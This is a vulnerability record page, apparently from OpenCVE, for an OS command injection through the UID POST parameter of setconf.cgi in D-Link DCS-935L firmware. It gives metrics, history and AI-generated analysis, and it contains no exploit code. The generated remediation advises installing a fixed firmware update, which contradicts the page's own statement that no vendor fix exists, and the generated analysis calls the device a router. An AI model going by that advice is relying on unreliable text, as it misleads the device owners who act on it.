Description
A vulnerability has been found in D-Link DCS-935L 1.10.01. This affects the function sub_400E40 of the file setconf.cgi of the component POST Parameter Handler. Such manipulation of the argument UID leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
Published: 2026-06-29
Score: 8.7 High
EPSS: 2.7% Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An OS command injection flaw exists in the setconf.cgi component of D-Link DCS‑935L firmware 1.10.01. The vulnerability is triggered by tampering with the POST parameter UID, causing the sub_400E40 function to execute arbitrary shell commands. Successful exploitation would allow an attacker to run any command on the device with the privileges of the web server process, effectively granting full control over the device. The weakness corresponds to CWE‑77 and CWE‑78, identifying it as an input‑validation and command‑execution flaw.

Affected Systems

The affected devices are D‑Link DCS‑935L routers running firmware version 1.10.01. No other versions or models are explicitly listed as affected in the current records.

Risk and Exploitability

The CVSS score of 8.7 classifies this flaw as a high‑severity vulnerability with a Remote Attack Vector. The EPSS score of 3% indicates a low but non‑zero exploitation probability, yet the vulnerability has already been publicly disclosed, indicating readiness for attack. It is not yet listed in the CISA KEV catalog, and the risk remains high due to remote exploitation and public disclosure, while patch availability is not confirmed.

Generated by OpenCVE AI on July 2, 2026 at 11:58 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Install the latest firmware update from D‑Link that removes the command‑injection bug in setconf.cgi.
  • If a firmware update is not available, disable remote management or lock the web interface to a trusted IP range to block access to the vulnerable endpoint.
  • Deploy a web application firewall or similar filtering to reject POST requests to setconf.cgi that contain shell metacharacters or suspicious UID values.
  • Monitor router logs for unusual POST activity to setconf.cgi and investigate any anomalies.

Generated by OpenCVE AI on July 2, 2026 at 11:58 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 29 Jun 2026 15:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Mon, 29 Jun 2026 08:45:00 +0000

Type Values Removed Values Added
Description A vulnerability has been found in D-Link DCS-935L 1.10.01. This affects the function sub_400E40 of the file setconf.cgi of the component POST Parameter Handler. Such manipulation of the argument UID leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
Title D-Link DCS-935L POST Parameter setconf.cgi sub_400E40 os command injection
First Time appeared D-link
D-link dcs-935l
Weaknesses CWE-77
CWE-78
CPEs cpe:2.3:h:d-link:dcs-935l:*:*:*:*:*:*:*:*
Vendors & Products D-link
D-link dcs-935l
References
Metrics cvssV2_0

{'score': 9, 'vector': 'AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:ND/RC:UR'}

cvssV3_0

{'score': 8.8, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:X/RC:R'}

cvssV3_1

{'score': 8.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:X/RC:R'}

cvssV4_0

{'score': 8.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P'}


cve-icon MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-06-29T14:52:35.010Z

Reserved: 2026-06-28T10:17:07.204Z

Link: CVE-2026-13545

cve-icon Vulnrichment

Updated: 2026-06-29T14:13:39.769Z

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-07-02T12:00:11Z

Weaknesses
  • CWE-77

    Improper Neutralization of Special Elements used in a Command ('Command Injection')

  • CWE-78

    Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')